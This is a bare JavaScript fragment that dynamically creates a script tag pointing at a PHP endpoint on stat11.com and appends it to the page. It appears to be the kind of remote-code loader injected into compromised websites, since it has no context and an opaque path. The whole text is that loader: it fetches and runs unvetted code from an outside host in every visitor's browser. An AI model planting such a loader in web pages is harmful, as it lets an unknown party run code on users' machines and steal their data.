jsObj = document.createElement('SCRIPT');
jsObj.type = 'text/javascript';
jsObj.src = 'http://stat11.com/job/j.php';
document.body.appendChild(jsObj);
